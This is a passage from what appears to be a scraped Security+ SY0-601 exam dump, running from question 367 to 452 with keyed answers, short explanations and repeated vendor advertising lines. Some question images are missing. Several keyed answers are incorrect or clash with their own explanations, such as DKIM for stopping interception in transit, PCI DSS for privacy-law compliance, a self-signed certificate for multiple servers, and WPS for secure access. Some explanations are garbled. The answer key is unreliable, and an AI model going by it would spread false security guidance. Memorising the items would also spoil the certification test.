and MAC filtering can't prevent MAC spoofing so physical checking each system will clarify the
unknown hostname.
QUESTION 367
Which of the following should a data owner require all personnel to sign to legally protect
intellectual property?
A.
B.
C.
D.
An NDA
An AUP
An ISA
An MOU
Answer: A
QUESTION 368
A security administrator needs to inspect in-transit files on the enterprise network to search for
Pll, credit card data, and classification words. Which of the following would be the BEST to use?
A.
B.
C.
D.
IDS solution
EDR solution
HIPS software solution
Network DLP solution
Answer: D
QUESTION 369
A security analyst must determine if either SSH or Telnet is being used to log in to servers. Which
of the following should the analyst use?
A.
B.
C.
D.
logger
Metasploit
tcpdump
netstat
Answer: D
QUESTION 370
A security administrator is trying to determine whether a server is vulnerable to a range of
attacks. After using a tool, the administrator obtains the following output:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
130
Which of the following attacks was successfully implemented based on the output?
A.
B.
C.
D.
Memory leak
Race conditions
SQL injection
Directory traversal
Answer: D
Explanation:
Directory traversal is a type of HTTP exploit that is used by attackers to gain unauthorized access
to restricted directories and files.
QUESTION 371
An organization's finance department is implementing a policy to protect against collusion. Which
of the following control types and corresponding procedures should the organization implement to
fulfill this policy's requirement? (Choose two.)
A.
B.
C.
D.
E.
F.
Corrective
Deterrent
Preventive
Mandatory vacations
Job rotation
Separation of duties
Answer: DE
QUESTION 372
A security analyst is investigating a vulnerability in which a default file permission was set
incorrectly. The company uses non-credentialed scanning for vulnerability management.
Which of the following tools can the analyst use to verify the permissions?
A.
B.
C.
D.
E.
F.
ssh
chmod
ls
setuid
nessus
nc
Answer: C
Explanation:
chmod is used to change the permissions and using a command such as "ls -l" you can see the
permissions r*w*x (read, write, execute).
QUESTION 373
A Chief Security Officer (CSO) is concerned about the volume and integrity of sensitive
information that is exchanged between the organization and a third party through email. The CSO
is particularly concerned about an unauthorized party who is intercepting information that is in
transit between the two organizations. Which of the following would address the CSO's
concerns?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
131
A.
B.
C.
D.
E.
SPF
DMARC
SSL
DKIM
TLS
Answer: D
QUESTION 374
Which of the following BEST describes the MFA attribute that requires a callback on a predefined
landline?
A.
B.
C.
D.
Something you exhibit
Something you can do
Someone you know
Somewhere you are
Answer: B
Explanation:
Something you can do: The only reason you can call that landline is because you can see the
number at that time. No one else can.
QUESTION 375
A multinational organization that offers web-based services has datacenters that are located only
in the United States; however, a large number of its customers are in Australia, Europe, and
China. Payments for services are managed by a third party in the United Kingdom that
specializes in payment gateways. The management team is concerned the organization is not
compliant with privacy laws that cover some of its customers. Which of the following frameworks
should the management team follow?
A.
B.
C.
D.
Payment Card Industry Data Security Standard
Cloud Security Alliance Best Practices
ISO/IEC 27032 Cybersecurity Guidelines
General Data Protection Regulation
Answer: A
QUESTION 376
A remote user recently took a two-week vacation abroad and brought along a corporate-owned
laptop. Upon returning to work, the user has been unable to connect the laptop to the VPN.
Which of the following is the MOST likely reason for the user's inability to connect the laptop to
the VPN? (Choose two.)
A.
B.
C.
D.
E.
F.
Due to foreign travel, the user's laptop was isolated from the network.
The user's laptop was quarantined because it missed the latest patch update.
The VPN client was blacklisted.
The user's account was put on a legal hold.
The laptop is still configured to connect to an international mobile network operator.
The user in unable to authenticate because they are outside of the organization's mobile
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
132
geofencing configuration.
Answer: AB
QUESTION 377
The concept of connecting a user account across the systems of multiple enterprises is BEST
known as:
A.
B.
C.
D.
federation.
a remote access policy.
multifactor authentication.
single sign-on.
Answer: A
Explanation:
SSO allows users to use a single set of credentials to access multiple systems within a single
organization (a single domain) while Federation allow users to access systems across multiple
organizations.
QUESTION 378
A Chief Executive Officer (CEO) is dissatisfied with the level of service from the company's new
service provider. The service provider is preventing the CEO. from sending email from a work
account to a personal account. Which of the following types of service providers is being used?
A.
B.
C.
D.
Telecommunications service provider
Cloud service provider
Master managed service provider
Managed security service provider
Answer: D
Explanation:
DLP is one to the service MSSP provides.
QUESTION 379
Entering a secure area requires passing through two doors, both of which require someone who
is already inside to initiate access. Which of the following types of physical security controls does
this describe?
A.
B.
C.
D.
E.
Cameras
Faraday cage
Access control vestibule
Sensors
Guards
Answer: C
Explanation:
Security vestibules provide additional protection by adding a secured space. Vestibules are
secured spaces with two of more sets of doors and an office sign-in area.
QUESTION 380
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
133
The lessons-learned analysis from a recent incident reveals that an administrative office worker
received a call from someone claiming to be from technical support. The caller convinced the
office worker to visit a website, and then download and install a program masquerading as an
antivirus package. The program was actually a backdoor that an attacker could later use to
remote control the worker's PC. Which of the following would be BEST to help prevent this type of
attack in the future?
A.
B.
C.
D.
Data loss prevention
Segmentation
Application whitelisting
Quarantine
Answer: C
Explanation:
Application Whitelisting - aimed at preventing malicious programs from running on a network. It
monitors the operating system, in real-time, to prevent any unauthorized files from executing.
QUESTION 381
A security administrator has noticed unusual activity occurring between different global instances
and workloads and needs to identify the source of the unusual traffic. Which of the following log
sources would be BEST to show the source of the unusual traffic?
A.
B.
C.
D.
HIDS
UEBA
CASB
VPC
Answer: C
QUESTION 382
A manufacturing company has several one-off legacy information systems that cannot be
migrated to a newer OS due to software compatibility issues. The Oss are still supported by the
vendor, but the industrial software is no longer supported. The Chief Information Security Officer
(CISO) has created a resiliency plan for these systems that will allow OS patches to be installed
in a non-production environment, while also creating backups of the systems for recovery.
Which of the following resiliency techniques will provide these capabilities?
A.
B.
C.
D.
Redundancy
RAID 1+5
Virtual machines
Full backups
Answer: D
Explanation:
Since they are still testing out the OS patch using non-production devices, they need a backup for
their rollback plan. Hence, they need Full backup just in case everything goes wrong right after
the OS patch.
QUESTION 383
Which of the following terms should be included in a contract to help a company monitor the
ongoing security maturity of a new vendor?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
134
A.
B.
C.
D.
A right-to-audit clause allowing for annual security audits
Requirements for event logs to be kept for a minimum of 30 days
Integration of threat intelligence in the company's AV
A data-breach clause requiring disclosure of significant data loss
Answer: A
QUESTION 384
An incident, which is affecting dozens of systems, involves malware that reaches out to an
Internet service for rules and updates. The IP addresses for the Internet host appear to be
different in each case. The organization would like to determine a common IoC to support
response and recovery actions.
Which of the following sources of information would BEST support this solution?
A.
B.
C.
D.
Web log files
Browser cache
DNS query logs
Antivirus
Answer: C
QUESTION 385
Which of the following represents a biometric FRR?
A.
B.
C.
D.
Authorized users being denied access
Users failing to enter the correct PIN
The denied and authorized numbers being equal
The number of unauthorized users being granted access
Answer: A
QUESTION 386
A web server administrator has redundant servers and needs to ensure failover to the secondary
server when the primary server goes down. Which of the following should the administrator
implement to avoid disruption?
A.
B.
C.
D.
NIC teaming
High availability
Dual power supply
laaS
Answer: B
QUESTION 387
Which of the following is a cryptographic concept that operates on a fixed length of bits?
A. Block cipher
B. Hashing
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
135
C. Key stretching
D. Salting
Answer: A
Explanation:
Single-key or symmetric-key encryption algorithms create a fixed length of bits known as a block
cipher with a secret key that the creator/sender uses to encipher data (encryption) and the
receiver uses to decipher it.
QUESTION 388
An organization regularly scans its infrastructure for missing security patches but is concerned
about hackers gaining access to the scanner's account.
Which of the following would be BEST to minimize this risk?
A.
B.
C.
D.
Require a complex, eight-character password that is updated every 90 days.
Perform only non-intrusive scans of workstations.
Use non-credentialed scans against high-risk servers.
Log and alert on unusual scanner account logon times.
Answer: D
QUESTION 389
The new Chief Executive Officer (CEO) of a large company has announced a partnership with a
vendor that will provide multiple collaboration applications to make remote work easier. The
company has a geographically dispersed staff located in numerous remote offices in different
countries. The company's IT administrators are concerned about network traffic and load if all
users simultaneously download the application.
Which of the following would work BEST to allow each geographic region to download the
software without negatively impacting the corporate network?
A.
B.
C.
D.
Update the host IDS rules.
Enable application whitelisting.
Modify the corporate firewall rules.
Deploy all applications simultaneously.
Answer: D
Explanation:
If you have several applications that you need to deploy together, instead of creating multiple
deployments, create an application group. You can send the app group to a user or device
collection as a single deployment.
QUESTION 390
A Chief Security Officer (CSO) was notified that a customer was able to access confidential
internal company files on a commonly used file-sharing service. The file-sharing service is the
same one used by company staff as one of its approved third-party applications. After further
investigation, the security team determines the sharing of confidential files was accidental and not
malicious. However, the CSO wants to implement changes to minimize this type of incident from
reoccurring but does not want to impact existing business processes. Which of the following
would BEST meet the CSO's objectives?
A. DLP
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
136
B.
C.
D.
E.
SWG
CASB
Virtual network segmentation
Container security
Answer: A
QUESTION 391
Which of the following is a reason why an organization would define an AUP?
A. To define the lowest level of privileges needed for access and use of the organization's
resources
B. To define the set of rules and behaviors for users of the organization's IT systems
C. To define the intended partnership between two organizations
D. To define the availability and reliability characteristics between an IT provider and consumer
Answer: B
QUESTION 392
A security analyst needs to perform periodic vulnerably scans on production systems. Which of
the following scan types would produce the BEST vulnerability scan report?
A.
B.
C.
D.
Port
Intrusive
Host discovery
Credentialed
Answer: D
QUESTION 393
To further secure a company's email system, an administrator is adding public keys to DNS
records in the company's domain Which of the following is being used?
A.
B.
C.
D.
PFS
SPF
DMARC
DNSSEC
Answer: D
QUESTION 394
An.. that has a large number of mobile devices is exploring enhanced security controls to manage
unauthorized access if a device is lost or stolen. Specifically, if mobile devices are more than 3mi
(4 8km) from the building, the management team would like to have the security team alerted and
server resources restricted on those devices. Which of the following controls should the
organization implement?
A. Geofencing
B. Lockout
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
137
C. Near-field communication
D. GPS tagging
Answer: A
QUESTION 395
A customer called a company's security team to report that all invoices the customer has received
over the last five days from the company appear to have fraudulent banking details. An
investigation into the matter reveals the following:
- The manager of the accounts payable department is using the same password across multiple
external websites and the corporate account.
- One of the websites the manager used recently experienced a data breach.
- The manager's corporate email account was successfully accessed in the last five days by an IP
address located in a foreign country
Which of the following attacks has MOST likely been used to compromise the manager's
corporate account?
A.
B.
C.
D.
E.
Remote access Trojan
Brute-force
Dictionary
Credential stuffing
Password spraying
Answer: D
QUESTION 396
An organization has implemented a two-step verification process to protect user access to data
that 6 stored in the could. Each employee now uses an email address of mobile number a code to
access the data.
Which of the following authentication methods did the organization implement?
A.
B.
C.
D.
Token key
Static code
Push notification
HOTP
Answer: D
QUESTION 397
A company Is concerned about is security after a red-team exercise. The report shows the team
was able to reach the critical servers due to the SMB being exposed to the Internet and running
NTLMV1, Which of the following BEST explains the findings?
A.
B.
C.
D.
Default settings on the servers
Unsecured administrator accounts
Open ports and services
Weak Data encryption
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
138
Answer: C
QUESTION 398
Which of the following would be BEST for a technician to review to determine the total risk an
organization can bear when assessing a "cloud-first" adoption strategy?
A.
B.
C.
D.
Risk matrix
Risk tolerance
Risk register
Risk appetite
Answer: B
QUESTION 399
A network manager is concerned that business may be negatively impacted if the firewall in its
datacenter goes offline. The manager would like to Implement a high availability pair to:
A.
B.
C.
D.
decrease the mean ne between failures
remove the single point of failure
cut down the mean tine to repair
reduce the recovery time objective
Answer: B
QUESTION 400
A recent security assessment revealed that an actor exploited a vulnerable workstation within an
organization and has persisted on the network for several months.
The organization realizes the need to reassess its security strategy for mitigating risks within the
perimeter.
Which of the following solutions would BEST support the organization’s strategy?
A.
B.
C.
D.
FIM
DLP
EDR
UTM
Answer: D
QUESTION 401
A security analyst is concerned about traffic initiated to the dark web form the corporate LAN.
Which of the following networks should the analyst monitor?
A.
B.
C.
D.
SFTP
AS
Tor
IoC
Answer: C
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
139
QUESTION 402
A global company is experiencing unauthorized logging due to credential theft and account
lockouts caused by brute-force attacks. The company is considering implementing a third-party
identity provider to help mitigate these attacks. Which of the following would be the BEST control
for the company to require from prospective vendors'?
A.
B.
C.
D.
IP restrictions
Multifactor authentication
A banned password list
A complex password policy
Answer: B
QUESTION 403
A systems administrator needs to install the same X.509 certificate on multiple servers. Which of
the following should the administrator use?
A.
B.
C.
D.
Key escrow
A self-signed certificate
Certificate chaining
An extended validation certificate
Answer: B
QUESTION 404
n organization plans to transition the intrusion detection and prevention techniques on a critical
subnet to an anomaly-based system. Which of the following does the organization need to
determine for this to be successful?
A.
B.
C.
D.
The baseline
The endpoint configurations
The adversary behavior profiles
The IPS signatures
Answer: A
QUESTION 405
A small business office is setting up a wireless infrastructure with primary requirements centered
around protecting customer information and preventing unauthorized access to the business
network. Which of the following would BEST support the office's business needs? (Select TWO)
A.
B.
C.
D.
E.
F.
Installing WAPs with strategic placement
Configuring access using WPA3
Installing a WIDS
Enabling MAC filtering
Changing the WiFi password every 30 days
Reducing WiFi transmit power throughout the office
Answer: BD
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
140
QUESTION 406
A company just implemented a new telework policy that allows employees to use personal
devices for official email and file sharing while working from home. Some of the requirements are:
- Employees must provide an alternate work location (i.e., a home address)
- Employees must install software on the device that will prevent the loss of proprietary data but
will not restrict any other software from being installed.
Which of the following BEST describes the MDM options the company is using?
A. Geofencing, content management, remote wipe, containerization, and storage segmentation
B. Content management, remote wipe, geolocation, context-aware authentication, and
containerization
C. Application management, remote wipe, geofencing, context-aware authentication, and
containerization
D. Remote wipe, geolocation, screen locks, storage segmentation, and full-device encryption
Answer: C
QUESTION 407
A security administrator is analyzing the corporate wireless network. The network only has two
access points running on channels 1 and 11. While using airodump-ng, the administrator notices
other access points are running with the same corporate ESSID on all available channels and
with the same BSSID of one of the legitimate access points. Which of the following attacks is
happening on the corporate network?
A.
B.
C.
D.
E.
On-path
Evil twin
Jamming
Rogue access point
Disassociation
Answer: B
Explanation:
Evil twin attacks are a type of Man in the Middle (MitM) attack in which a fake Wi-Fi network is set
up to steal information or further infiltrate a connecting device. This is often done in public settings
where people are most likely to look for or connect to freely available Wi-Fi.
The evil twins here is the access points with the same SSID as the legitimate access points.
QUESTION 408
During a security assessment, a security analyst finds a file with overly permissive permissions.
Which of the following tools will allow the analyst to reduce the permissions for the existing users
and groups and remove the set-user-ID bit from the file?
A.
B.
C.
D.
E.
ls
chflags
chmod
leof
setuid
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
141
Answer: C
Explanation:
Chmod is the Linux command used to change access permissions of a file.
The general form of the command is chmod <options> <permissions> <filename>
QUESTION 409
A company has discovered unauthorized devices are using its WiFi network, and it wants to
harden the access point to improve security. Which of the following configuration should an
analyst enable to improve security? (Select Two)
A.
B.
C.
D.
E.
F.
RADIUS
PEAP
WPS
WEP-TKIP
SSL
WPA2-PSK
Answer: AF
QUESTION 410
A security engineer obtained the following output from a threat intelligence source that recently
performed an attack on the company's server:
Which of the following BEST describes this kind of attack?
A.
B.
C.
D.
Directory traversal
SQL injection
API
Request forgery
Answer: A
Explanation:
literally says etc passwd, which is a file in a directory. %2F is ascii hex code for a slash. This is a
directory traversal attack.
QUESTION 411
The spread of misinformation surrounding the outbreak of a novel virus on election day led to
eligible voters choosing not to take the risk of going the polls. This is an example of:
A.
B.
C.
D.
E.
prepending.
an influence campaign
a watering-hole attack
intimidation
information elicitation
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
142
Answer: B
QUESTION 412
A security engineer is installing a WAF to protect the company's website from malicious web
requests over SSL. Which of the following is needed to meet the objective?
A.
B.
C.
D.
A reverse proxy
A decryption certificate
A split-tunnel VPN
Load-balanced servers
Answer: B
QUESTION 413
An enterprise needs to keep cryptographic keys in a safe manner. Which of the following network
appliances can achieve this goal?
A.
B.
C.
D.
HSM
CASB
TPM
DLP
Answer: A
QUESTION 414
Ann, a forensic analyst, needs to prove that the data she originally acquired has remained
unchanged while in her custody. Which of the following should Ann use?
A.
B.
C.
D.
Chain of custody
Checksums
Non-repudiation
Legal hold
Answer: B
QUESTION 415
The following are the logs of a successful attack.
Which of the following controls would be BEST to use to prevent such a breach in the future?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
143
A.
B.
C.
D.
Password history
Account expiration
Password complexity
Account lockout
Answer: D
QUESTION 416
An organization recently acquired an ISO 27001 certification. Which of the following would MOST
likely be considered a benefit of this certification?
A.
B.
C.
D.
E.
It allows for the sharing of digital forensics data across organizations
It provides insurance in case of a data breach
It provides complimentary training and certification resources to IT security staff.
It certifies the organization can work with foreign entities that require a security clearance
It assures customers that the organization meets security standards
Answer: E
QUESTION 417
Which of the following is the MOST secure but LEAST expensive data destruction method for
data that is stored on hard drives?
A.
B.
C.
D.
Pulverizing
Shredding
Incinerating
Degaussing
Answer: B
Explanation:
Shredding is the most secure and cost effective way to dispose of all types of end-of-life hard
drives and media tapes.
QUESTION 418
Server administrators want to configure a cloud solution so that computing memory and
processor usage is maximized most efficiently across a number or virtual servers.
They also need to avoid potential denial-of-service situations caused by availability.
Which of the following should administrators configure to maximize system availability while
efficiently utilizing available computing power?
A.
B.
C.
D.
Dynamic resource allocation
High availably
Segmentation
Container security
Answer: A
Explanation:
Dynamic resource allocation lets you scale resources up or down as needed to be more efficient.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
144
QUESTION 419
A company is required to continue using legacy software to support a critical service. Which of
the following BEST explains a risk of this practice?
A.
B.
C.
D.
Default system configuration
Unsecure protocols
Lack of vendor support
Weak encryption
Answer: C
Explanation:
Lack of vendor support implies no security patches. Unsecure protocols are not necessarily
always the case.
QUESTION 420
A security researcher has alerted an organization that its sensitive user data was found for sale
on a website. Which of the following should the organization use to inform the affected parties?
A.
B.
C.
D.
An incident response plan
A communications plan
A business continuity plan
A disaster recovery plan
Answer: A
QUESTION 421
A company wants to modify its current backup strategy to minimize the number of backups that
would need to be restored in case of data loss. Which of the following would be the BEST backup
strategy to implement?
A.
B.
C.
D.
E.
Incremental backups followed by differential backups
Full backups followed by incremental backups
Delta backups followed by differential backups
Incremental backups followed by delta backups
Full backups followed by differential backups
Answer: E
Explanation:
Differential backups are quicker than full backups because so much less data is being backed up.
But the amount of data being backed up grows with each differential backup until the next full
back up. Differential backups are more flexible than full backups, but still unwieldy to do more
than about once a day, especially as the next full backup approaches.
QUESTION 422
While investigating a recent security incident, a security analyst decides to view all network
connections on a particular server, Which of the following would provide the desired information?
A. arp
B. nslookup
C. netstat
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
145
D. nmap
Answer: C
Explanation:
Nmap is a Network mapping tool. That means it's used to discover information about hosts on a
network (their ip, open ports, etc). Where netstat is a network statistic tool used to list active
connections.
QUESTION 423
Joe, an employee, is transferring departments and is providing copies of his files to a network
share folder for his previous team to access. Joe is granting read-write-execute permissions to
his manager but giving read-only access to the rest of the team.
Which of the following access controls is Joe using?
A.
B.
C.
D.
FACL
DAC
ABAC
MAC
Answer: A
Explanation:
The file permissions according to the file system access control list (FACL) are rw-rw-r–. The first
'rw-' are the file owner permissions (read and write). The second 'rw-' are the group permissions
(read and write) for the group that has been assigned the file.
QUESTION 424
When implementing automation with loT devices, which of the following should be considered
FIRST to keep the network secure?
A.
B.
C.
D.
2-Wave compatibility
Network range
Zigbee configuration
Communication protocols
Answer: C
Explanation:
Zigbee is a wireless specification to address the needs of low-cost, low-power wireless IoT data
networks.
QUESTION 425
A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no
patches are currently available to resolve the issue. The security administrator is concerned that
servers in the company's DMZ will be vulnerable to external attack; however, the administrator
cannot disable the service on the servers, as SMB is used by a number of internal systems and
applications on the LAN.
Which of the following TCP ports should be blocked for all external inbound connections to the
DMZ as a workaround to protect the servers? (Choose two.)
A. 135
B. 139
C. 143
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
146
D. 161
E. 443
F. 445
Answer: BF
Explanation:
SMB use TCP Port 139, 445 and UDP Port 137, 138.
QUESTION 426
A major clothing company recently lost a large amount of proprietary information The security
officer must find a solution to ensure this never happens again.
Which of the following is the BEST technical implementation to prevent this from happening
again?
A.
B.
C.
D.
E.
Configure DLP solutions
Disable peer-to-peer sharing.
Enable role-based access controls
Mandate job rotation.
Implement content filters
Answer: A
QUESTION 427
Which of the following types of attacks is specific to the individual it targets?
A.
B.
C.
D.
Whaling
Pharming
Smishing
Credential harvesting
Answer: A
Explanation:
What Is a Whaling Attack?
A whaling attack is a type of phishing attack where a particularly important person in the
organization is targeted. It hinges on the cyber criminal pretending to be a senior member of the
organization to gain the trust of the intended target. Once trust is gained, the attacker can prod
the target for information that helps them access sensitive areas of the network, passwords, or
other user account information.
https://www.fortinet.com/resources/cyberglossary/whaling-attack
QUESTION 428
A financial analyst has been accused of violating the company's AUP and there is forensic
evidence to substantiate the allegation. Which of the following would dispute the analyst's claim
of innocence?
A.
B.
C.
D.
Legal hold
Order of volatility
Non-repudiation
Chain of custody
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
147
Answer: C
QUESTION 429
A large financial services firm recently released information regarding a security bfeach within its
corporate network that began several years before. During the time frame in which the breach
occurred, indicators show an attacker gained administrative access to the network through a file
download from a social media site and subsequently installed it without the user's knowledge.
Since the compromise, the attacker was able to take command and control of the computer
systems anonymously while obtaining sensitive corporate and personal employee information.
Which of the following methods did the attacker MOST likely use to gam access?
A.
B.
C.
D.
A bot
A fileless virus
A logic bomb
A RAT
Answer: D
QUESTION 430
Which of the following cryptographic concepts would a security engineer utilize while
implementing non-repudiation? (Select TWO)
A.
B.
C.
D.
E.
F.
Block cipher
Hashing
Private key
Perfect forward secrecy
Salting
Symmetric keys
Answer: BC
QUESTION 431
A security administrator is setting up a SIEM to help monitor for notable events across the
enterprise. Which of the following control types does this BEST represent?
A.
B.
C.
D.
Preventive
Compensating
Corrective
Detective
Answer: D
QUESTION 432
Which of the following BEST describes a social-engineering attack that relies on an executive at a
small business visiting a fake banking website where credit card and account details are
harvested?
A. Whaling
B. Spam
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
148
C. Invoice scam
D. Pharming
Answer: D
QUESTION 433
A systems administrator is considering different backup solutions for the IT infrastructure. The
company is looking for a solution that offers the fastest recovery time while also saving the most
amount of storage used to maintain the backups. Which of the following recovery solutions would
be the BEST option to meet these requirements?
A.
B.
C.
D.
Snapshot
Differential
Full
Tape
Answer: B
QUESTION 434
A retail company that is launching a new website to showcase the company’s product line and
other information for online shoppers registered the following URLs:
www.companysite.com
shop.companysite.com
about-us.companysite.com
contact-us.companysite.com
secure-logon.companysite.com
Which of the following should the company use to secure its website if the company is concerned
with convenience and cost?
A.
B.
C.
D.
E.
A self-signed certificate
A root certificate
A code-signing certificate
A wildcard certificate
An extended validation certificate
Answer: D
QUESTION 435
An organization would like to remediate the risk associated with its cloud service provider not
meeting its advertised 99.999% availability metrics.
Which of the following should the organization consult for the exact requirements for the cloud
provider?
A.
B.
C.
D.
SLA
BPA
NDA
MOU
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
149
Answer: A
Explanation:
A service-level agreement (SLA) defines the level of service expected by a customer from a
supplier, laying out the metrics by which that service is measured, and the remedies or penalties,
if any, should the agreed-on service levels not be achieved.
QUESTION 436
A network analyst is setting up a wireless access point for a home office in a remote, rural
location. The requirement is that users need to connect to the access point securely but do not
want to have to remember passwords.
Which of the following should the network analyst enable to meet the requirement?
A.
B.
C.
D.
MAC address filtering
802.1X
Captive portal
WPS
Answer: D
QUESTION 437
A security analyst wants to verify that a client-server (non-web) application is sending encrypted
traffic. Which of the following should the analyst use?
A.
B.
C.
D.
openssl
hping
netcat
tcpdump
Answer: D
QUESTION 438
A security engineer needs to create a network segment that can be used for servers that require
connections from untrusted networks. When of the following should the engineer implement?
A.
B.
C.
D.
An air gap
A hot site
A VLAN
A screened subnet
Answer: D
QUESTION 439
During an incident, a company’s CIRT determines it is necessary to observe the continued
network-based transactions between a callback domain and the malware running on an
enterprise PC. Which of the following techniques would be BEST to enable this activity while
reducing the risk of lateral spread and the risk that the adversary would notice any changes?
A. Physically move the PC to a separate Internet point of presence.
B. Create and apply microsegmentation rules.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
150
C. Emulate the malware in a heavily monitored DMZ segment.
D. Apply network blacklisting rules for the adversary domain.
Answer: B
QUESTION 440
A company has three technicians who share the same credentials for troubleshooting system.
Every time credentials are changed, the new ones are sent by email to all three technicians. The
security administrator has become aware of this situation and wants to implement a solution to
mitigate the risk. Which of the following is the BEST solution for company to implement?
A.
B.
C.
D.
SSO authentication
SSH keys
OAuth authentication
Password vaults
Answer: A
QUESTION 441
An enterprise has hired an outside security firm to facilitate penetration testing on its network and
applications. The firm has agreed to pay for each vulnerability that is discovered. Which of the
following BEST represents the type of testing that is being used?
A.
B.
C.
D.
E.
White-box
Red-team
Bug bounty
Gray-box
Black-box
Answer: C
QUESTION 442
If a current private key is compromised, which of the following would ensure it cannot be used to
decrypt all historical data?
A.
B.
C.
D.
Perfect forward secrecy
Elliptic-curve cryptography
Key stretching
Homomorphic encryption
Answer: A
Explanation:
Perfect Forward Secrecy (PFS), also called forward secrecy (FS), refers to an encryption system
that changes the keys used to encrypt and decrypt information frequently and automatically. This
ongoing process ensures that even if the most recent key is hacked, a minimal amount of
sensitive data is exposed.
QUESTION 443
After a hardware incident, an unplanned emergency maintenance activity was conducted to
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
151
rectify the issue. Multiple alerts were generated on the SIEM during this period of time.
Which of the following BEST explains what happened?
A.
B.
C.
D.
The unexpected traffic correlated against multiple rules, generating multiple alerts.
Multiple alerts were generated due to an attack occurring at the same time.
An error in the correlation rules triggered multiple alerts.
The SIEM was unable to correlate the rules, triggering the alerts.
Answer: A
Explanation:
Maintenance = unexpected traffic and logs which can definitely trigger alerts
QUESTION 444
Which of the following environments utilizes dummy data and is MOST likely to be installed
locally on a system that allows code to be assessed directly and modified easily with each build?
A.
B.
C.
D.
Production
Test
Staging
Development
Answer: D
Explanation:
The development environment is the earliest stage of the software development life cycle
(SDLC). It is where the code is first written and tested. The development environment is typically
installed locally on a system that allows the developer to easily assess the code and make
changes.
To facilitate rapid development and testing, the development environment typically uses dummy
data. Dummy data is data that is not real but is used to represent real data. This allows the
developer to focus on the code and not have to worry about the data.
QUESTION 445
A company is implementing a new SIEM to log and send alerts whenever malicious activity is
blocked by its antivirus and web content filters.
Which of the following is the primary use case for this scenario?
A.
B.
C.
D.
Implementation of preventive controls
Implementation of detective controls
Implementation of deterrent controls
Implementation of corrective controls
Answer: B
QUESTION 446
A developer is concerned about people downloading fake malware-infected replicas of a popular
game. Which of the following should the developer do to help verify legitimate versions of the
game for users?
A. Digitally sign the relevant game files.
B. Embed a watermark using steganography.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
152
C. Implement TLS on the license activation server.
D. Fuzz the application for unknown vulnerabilities.
Answer: A
QUESTION 447
After segmenting the network, the network manager wants to control the traffic between the
segments. Which of the following should the manager use to control the network traffic?
A.
B.
C.
D.
A DMZ
A VPN
A VLAN
An ACL
Answer: D
Explanation:
The network manager should use an Access Control List (ACL) to control the traffic between the
segments. An ACL is a network filter that can be used to control the flow of network traffic based
on various criteria, such as the source or destination of the traffic, the type of traffic, or the port
number. By configuring an ACL, the network manager can specify which types of traffic are
allowed to pass between the network segments and which are not. This will help to prevent
unauthorized or malicious traffic from passing between the segments and potentially
compromising the network. A DMZ, VPN, or VLAN would not be appropriate for controlling the
traffic between the segments in this scenario.
QUESTION 448
An organization discovered a disgruntled employee exfiltrated a large amount of PII data by
uploading files Which of the following controls should the organization consider to mitigate this
risk?
A.
B.
C.
D.
EDR
Firewall
HIPS
DLP
Answer: D
QUESTION 449
An attack relies on an end user visiting a website the end user would typically visit, however, the
site is compromised and uses vulnerabilities in the end users browser to deploy malicious
software. Which of the blowing types of attack does this describe?
A.
B.
C.
D.
Smishing
Whaling
Watering hole
Phishing
Answer: C
QUESTION 450
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
153
A Chief Security Officer (CSO) has asked a technician to devise a solution that can detect
unauthorized execution privileges from the OS in both executable and data files, and can work in
conjunction with proxies or UTM.
Which of the following would BEST meet the CSO's requirements?
A.
B.
C.
D.
Fuzzing
Sandboxing
Static code analysis
Code review
Answer: B
Explanation:
What is a sandbox?
A sandbox can be defined as an isolated environment in a computer system or on a network that
is designed and developed to mimic end user operating system (OS) and environments, so as to
detect unauthorized execution privileges from the operating system (OS).
In cybersecurity, sandboxing is typically used to safely execute suspicious code and data files
without causing any harm to the host device or network. Also, sandboxing can work in
conjunction with proxies or unified threat management (UTM).
QUESTION 451
An organization has various applications that contain sensitive data hosted in the cloud. The
company's leaders are concerned about lateral movement across applications of different trust
levels. Which of the following solutions should the organization implement to address the
concern?
A.
B.
C.
D.
ISFW
UTM
SWG
CASB
Answer: D
QUESTION 452
Drag and Drop Question
Leveraging the information supplied below, complete the CSR for the server to set up TLS
(HTTPS).
-
Hostnam : ws01
Domain: comptia.org
IPv4: 10.1.9.50
IPV4: 10.2.10.50
Root: home.aspx
DNS CNAME:homesite.
INSTRUCTIONS
Drag the various data points to the correct locations within the CSR. Extension criteria belong in
the left-hand column and values belong in the corresponding row in the right-hand column.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
